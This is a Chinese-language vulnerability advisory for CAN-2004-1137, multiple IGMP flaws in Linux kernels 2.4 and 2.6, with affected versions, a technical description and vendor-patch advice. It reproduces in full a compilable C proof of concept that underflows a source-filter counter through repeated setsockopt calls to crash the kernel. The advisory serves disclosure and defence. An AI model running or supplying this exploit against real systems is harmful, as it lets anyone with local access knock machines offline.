Linux kernel IGMP多个安全漏洞

发布日期：2004-12-14

更新日期：2004-12-15

受影响系统：

Linux kernel 2.6.9

Linux kernel 2.6.8

Linux kernel 2.6.7

Linux kernel 2.6.6

Linux kernel 2.6.5

Linux kernel 2.6.4

Linux kernel 2.6.3

Linux kernel 2.6.2

Linux kernel 2.6.1

Linux kernel 2.6

Linux kernel 2.4.9

Linux kernel 2.4.8

Linux kernel 2.4.7

Linux kernel 2.4.6

Linux kernel 2.4.5

Linux kernel 2.4.4

Linux kernel 2.4.3

Linux kernel 2.4.28

Linux kernel 2.4.27

Linux kernel 2.4.26

Linux kernel 2.4.25

Linux kernel 2.4.24

Linux kernel 2.4.23

Linux kernel 2.4.22

Linux kernel 2.4.21

Linux kernel 2.4.20

Linux kernel 2.4.2

Linux kernel 2.4.19

Linux kernel 2.4.18

Linux kernel 2.4.17

Linux kernel 2.4.16

Linux kernel 2.4.15

Linux kernel 2.4.14

Linux kernel 2.4.13

Linux kernel 2.4.12

Linux kernel 2.4.11

Linux kernel 2.4.10

Linux kernel 2.4.1

Linux kernel 2.4描述：

CVE(CAN) ID: CAN-2004-1137

Linux Kernel是开放源代码操作系统Linux的内核。

Linux IGMP网络模块和对应的用户API存在多个安全问题，本地和远程攻击者可以利用这些漏洞提升特权，或使内核崩溃。

问题一存在于ip_mc_source()函数中，此函数可通过用户API(IP_(UN)BLOCK_SOURCE, IP_ADD/DROP_SOURCE_MEMBERSHIP,MCAST_(UN)BLOCK_SOURCE和 MCAST_JOIN/LEAVE_SOURCE_GROUP)调用，存在多个内核崩溃和内核内存覆盖问题。

通过递减'ip_sf_socklist'结构的'sl_count'计数器到0xffffffff，上面函数就会使内核进入无限循环，而导致内核崩溃。

随即整个kmalloc分配的内核内存会由于4字节的移位而引起突然机器重新启动，正确利用此漏洞可能造成特权提升。

问题二是由于问题一的原因，可能通过ip_mc_msfget()和ip_mc_gsfget()函数读取大量内核内存信息而造成内核溢出。使系统崩溃。

问题三存在于网络模块中的igmp_marksources()函数中，由IGMP组上下文调用，当接收到外部网络的查询时，由于对接收到到的IGMP消息参数缺少充分过滤，可导致一个越界读取内核内存问题，如果Linux机器支持多播的情况下，此漏洞可远程利用。

<*来源：Paul Starzetz （paul@starzetz.de）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=110304192803108&w=2

*>

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Paul Starzetz （paul@starzetz.de）提供了如下测试方法：

/*

* Linux igmp.c local DoS

* Warning: this code will crash your machine!

*

* gcc -O2 mreqfck.c -o mreqfck

*

* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.

*

* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"

* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION

* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.

*

*/

#include <stdio.h>

#include <unistd.h>

#include <errno.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <linux/types.h>

#define MCAST_INCLUDE 1

#define IP_MSFILTER 41

#define IP_UNBLOCK_SOURCE 37

#define IP_BLOCK_SOURCE 38

struct ip_msfilter

{

__u32 imsf_multiaddr;

__u32 imsf_interface;

__u32 imsf_fmode;

__u32 imsf_numsrc;

__u32 imsf_slist[1];

};

struct ip_mreq_source

{

__u32 imr_multiaddr;

__u32 imr_interface;

__u32 imr_sourceaddr;

};

void

fatal (const char *message)

{

printf ("\n");

if (!errno)

{

fprintf (stdout, "FATAL: %s\n", message);

}

else

{

fprintf (stdout, "FATAL: %s (%s) ", message,

(char *) (strerror (errno)));

}

printf ("\n");

fflush (stdout);

exit (1);

}

int

main ()

{

int s, r, l;

struct ip_mreqn mr;

struct ip_msfilter msf;

struct ip_mreq_source ms;

in_addr_t a1, a2;

s = socket (AF_INET, SOCK_DGRAM, 0);

if (s < 0)

fatal ("socket");

// first join mcast group

memset (&mr, 0, sizeof (mr));

mr.imr_multiaddr.s_addr = inet_addr ("224.0.0.199");

l = sizeof (mr);

r = setsockopt (s, SOL_IP, IP_ADD_MEMBERSHIP, &mr, l);

if (r < 0)

fatal ("setsockopt");

// add source filter count=1

memset (&ms, 0, sizeof (ms));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

ms.imr_sourceaddr = inet_addr ("4.5.6.7");

l = sizeof (ms);

r = setsockopt (s, SOL_IP, IP_BLOCK_SOURCE, &ms, l);

if (r < 0)

fatal ("setsockopt2");

// del source filter count = 0

// imr_multiaddr & imr_interface must correspond to ADD

memset (&ms, 0, sizeof (ms));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

ms.imr_sourceaddr = inet_addr ("4.5.6.7");

l = sizeof (ms);

r = setsockopt (s, SOL_IP, IP_UNBLOCK_SOURCE, &ms, l);

if (r < 0)

fatal ("setsockopt2");

// del again, count = -1

memset (&ms, 0, sizeof (ms));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

ms.imr_sourceaddr = inet_addr ("4.5.6.7");

l = sizeof (ms);

r = setsockopt (s, SOL_IP, IP_UNBLOCK_SOURCE, &ms, l);

if (r < 0)

fatal ("setsockopt3");

// crash

memset (&ms, 0, sizeof (ms));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

ms.imr_sourceaddr = inet_addr ("4.5.6.7");

l = sizeof (ms);

r = setsockopt (s, SOL_IP, IP_UNBLOCK_SOURCE, &ms, l);

if (r < 0)

fatal ("setsockopt4");

getchar ();

return 0;

}

建议：

厂商补丁：

Linux

-----

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.kernel.org/

• ·纯编码实现Access数据库的建立或压缩
• ·软件质量保证（SQA）何去何从？
• ·Javascript 中 浅拷贝与深拷贝的实现
• ·表单递交合法性检测 - 只接受数字
• ·javascript 函数原型
• ·快速掌握 CrystalReport for
• ·Some Comments about Cal
• ·[收藏]从Internet上抓取指定URL的源
• ·在VC中制作chm格式的在线帮助（原创）
• ·Saxon － XSLT与XQuery处理器